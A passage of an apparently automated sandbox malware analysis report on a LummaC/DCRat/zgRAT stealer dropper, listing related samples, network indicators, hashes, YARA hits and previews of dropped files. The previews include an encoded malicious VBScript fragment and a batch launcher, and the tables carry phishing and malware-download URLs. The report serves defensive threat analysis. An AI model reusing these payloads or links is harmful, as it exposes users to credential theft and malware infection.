steamcommunity.com	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zip	Get hash	malicious	LummaC	Browse	104.102.49.254
offeviablwke.site	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	172.67.197.40
file.garden	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.97.3
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.1.169
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
CLOUDFLARENETUS	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.1.169
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
AKAMAI-ASUS	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	104.102.35.2
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	173.223.116.167
	Xkci1BfrmX.lnk	Get hash	malicious	LonePage	Browse	23.56.162.185
	Snc2ZNvAZP.pdf	Get hash	malicious	Unknown	Browse	23.56.162.185
	Purchase Order IBT LPO-2320.eml	Get hash	malicious	Unknown	Browse	23.56.162.185
	SCAN_Client_No_XP9739270128398468932393.pdf	Get hash	malicious	HTMLPhisher	Browse	96.17.64.189
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Cr4745ElZg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	188.114.96.3
	Setup_10024.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ha9wYxkNI7.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	9KO1ScZ376.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 104.21.84.213
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 104.21.84.213
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 104.21.84.213
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	104.102.49.254 104.21.84.213
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 104.21.84.213
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.84.213
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 104.21.84.213
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 104.21.84.213
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.84.213
	PI#0034250924.xla.xlsx	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.84.213

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
C:\Edge\msedge.exe	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
C:\Users\user\Desktop\DqsZwsEl.log	7NrGfIpGYi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	mqJJr1R3v4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	Cr4745ElZg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	p3f932IsTO.exe	Get hash	malicious	DCRat	Browse
	UpU2O6YQxG.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Edge\61a52ddc9dd915

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	230
Entropy (8bit):	5.681618711739239
Encrypted:	false
SSDEEP:	6:C4yC84Ngn2pMUQd7G4ZKbIjTt2h339v5WcIN8FbrH:py/4N9MUQZZ31Yv5WKFbrH
MD5:	AE3EC2BFD652A88AF6AB5FF5786EC9D9
SHA1:	B96BF064B6A6A5E65B2231F937A74DA9375F8D1C
SHA-256:	B797B0034C505603624B3B17F6B414B449E76D8836A65F418E393384BD57EDB2
SHA-512:	9EEF24C9639F04A173ED7FF751983F4077608B38413F03D3F223D09F331EB00C7408AFB08648E180EA64FCA3254D1809288AB90085E4F66D5AB1A49D3E825EA0
Malicious:	false
Preview:	Ann1Sa8DTpC78u0EpaNQFcURYvAALmMz3xXIQ15LoDrxrSwbBlo2rMIhTWdha82rcMDLXrxyeCmBuhjF8j8k7UIrozz3YYvpLAVeOkDUx0XokGwwxXi09StHDWhh13ZGR6zuLE1YfowG6eGhDDGBz4p3QNb2Dfc3bRXoQCksfJUUfnLjP9eywXRXQ6d8n8VAM2ppHcQBdYfpjVXnC2mDAoHDA9XUimEhyUIm8g

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	data
Category:	dropped
Size (bytes):	229
Entropy (8bit):	5.838240404374592
Encrypted:	false
SSDEEP:	6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
MD5:	569A28CF34F3A51DB0CC4AA0369773EC
SHA1:	23488377EA3A37B61750952D541B867AB3D8B424
SHA-256:	86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
SHA-512:	3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.968079981014333
Encrypted:	false
SSDEEP:	3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
MD5:	68B1414DBD5A51F2F75912513D1A035E
SHA1:	A45E03F8EDADA7FDF3697EAA6D88785CD464D373
SHA-256:	48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
SHA-512:	AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
Malicious:	false
Preview:	%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%

C:\Edge\msedge.exe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse Filename: gh3zRWl4or.exe, Detection: malicious, Browse Filename: seoI30IZZr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.934941031819869
Encrypted:	false
SSDEEP:	48:6omVtuxZ8RxeOAkFJOcV4MKe28dTuwUQPbvqBHfuulB+hnqXSfbNtm:KRxvxVx9GUvkxTkZzNt
MD5:	7E15916912CE8950AB28ECCD8BCCA89A
SHA1:	E5ECC977F23AA544DC90F2C3468C4784B2892345
SHA-256:	51F090E8335870816865CE0BBC4F6F7F6864B58A16B980257F2E1FCFD2D95BA0
SHA-512:	9B45A12086017BA3FE38E7C9B351F3D626F484B69295DD9D97BA1D6B5B33E3D57669C8EC7F87F1B6438C36FC680F134395472EADADAA067C38C4D94A89A42B10
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..f.............................'... ...@....@.. ....................................@.................................l'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..D.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...$... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\6720a68e0fd3fa

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (797), with no line terminators
Category:	dropped
Size (bytes):	797
Entropy (8bit):	5.908437100823228
Encrypted:	false
SSDEEP:	12:JRHAf7LGNM1Azdp2SHvLX23uQAAnzCWDFltgOw8u08/v7mkz3bPBTVnLbywx37iv:JQ7yPv1Hz4ZzCeFrkzJzHfx376XNZ
MD5:	EEA1BCFF0FE03FEB7E5FEA5DD511092A
SHA1:	AD6ECE084F3E3F9273E2C7C053FCD0F74B170B43
SHA-256:	644836BAE72B983CAF32A84FB85CAAB8C8C1D5590691C3E839DE6981DB2B89B0
SHA-512:	6AB3EC2F53482D11EC91CEB20333CAE119B6C3BC33ABF4E2ABA7EE6CF02C91F07065FBA06D5B986DC81A57C8FF5784CF658D317A1F15E1BC61F77500EF3A85D3
Malicious:	false
Preview:	sdUX2lx5i05vWS9ivloHE6c1U81PMuogazUhTtLYMcvrqSLgUj1X1UswAdD3uisyLZVg7cOBZP5mKuLBxV4m3RoFGhg0qSont7gQ7oi2Vz7mZFlQSBGZoG43vPZa6YVHlR3NO4EIwBRDUCqA5QhpLO9nCmfsOI66e0BHMYBX78mmy1jsiYep1q5WSQKlZV3oFVidBjyhOKrNmWyLDwJznQFy4oz6OZ8lE7hcSFr9k7bq8st6b9imMDAzQtjWu2TyLFIoyV27EKPqzYzL52eO1VZA7sMigVPromf2kFHFHkhByT924Xb1XE6zqHrGJTbt5hCM37lzvYHRxXMnsUoJ3XTjppMcXA6xJyGQQx96vlG96pBS5EYzoSzhNdhNuJbucUI9R5W5VsXSRUn9n4hTmHJ08iDxPvLlJVgmhBA9rce64hQ2zhj0mIIVKRBs1ipjgvI6xBcl3hmJnN6aSK8sLU9BNLbQARHJx4ZIZTEyF87Ff8s7Vkark7XLwHtmjLllZdWsxxB8GJnNX4fOdd5Z1ajzgOWRkcO3XWpCl9KhjblaUKy1leJFQLt83hLjbtYn4t0BOcndTX0azIfWaeqGTJmLmqIEylGzD7fkUxnI0pw3VTJvBzI6DRUvHpYiTjpsRAW2n4Cm1hPnWtzShXC8cJwvnudpYEzRAElV6RIGxgFfCqYXzFB6hqPHNlO3bWOws8nSHeVQP5K6ERt7VFzSD3tTyeHVCOpaRSxDCGPUtvqlfTC61RhVh5tzOUemWANAPuowdp5P0ejSMHxecLdvrU3Wj8yrl

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wCnmgKwwXYQbWeNvWeCCOp.exe.log

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat

